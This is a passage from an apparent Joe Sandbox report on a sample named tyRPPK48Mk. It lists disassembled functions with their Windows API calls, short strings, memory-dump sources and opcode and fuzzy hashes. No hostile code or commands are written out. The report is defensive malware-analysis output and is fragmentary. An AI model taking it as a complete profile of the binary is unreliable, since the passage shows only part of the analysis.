                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: htonsinet_addr
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: <local>
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2038078732-4266983199
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469ED9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469F45
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 547829025-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7c603411a5222602cdcfe3af15c4e08234e094dc848fc6b68a26e5d012d1898d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9c74662f9608889423dda9af8a150397af45232da82e66dff643b54ec21f234b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c603411a5222602cdcfe3af15c4e08234e094dc848fc6b68a26e5d012d1898d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34012531600154A7CB00BE698C45A9F775D9B86330F10826FF918AB3C2DA789D8583A6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469FF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 0046A05F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 547829025-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 86c159d569193cb6d72f09be1a64ce1ce1e919128d4d0a71ade006b719aa4209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fa49ecb31c05320e145cf8a65f34790310dcfebb936fceea055cfe4fdaf5a434
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86c159d569193cb6d72f09be1a64ce1ce1e919128d4d0a71ade006b719aa4209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2601DB3170411467CB10BE699C45BDFB75CDF8A320F00C46FF918A7282D978D95983AA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044CE43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 0044CE78
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044CE9F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArrayCreateSafeVector_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 564309351-3724388283
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ae18a0e6088bde325f2b8f87e65bbb2aaade0ee39655e70765b31d945e00dc0b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B0122B390010CABD700DF5AEC41E9B77A8EB84300F00412BFA08D7241EB31EA52C7E0
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469F6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 00469FD4
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 547829025-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0e325451c43fc7f70be1918c47cd55933b25efa0ffc993eea719a8abd039539f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 915c6be262c944f3857b3f41bddee0575e1aa44dc928e753307ac2ed03b09582
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e325451c43fc7f70be1918c47cd55933b25efa0ffc993eea719a8abd039539f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01B53170015877CB10BAAA9C45BDF7B5C9B86320F41C46BB908E7282D678DE8983A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: EA06
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: u,D
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-3858472334
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044CDE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
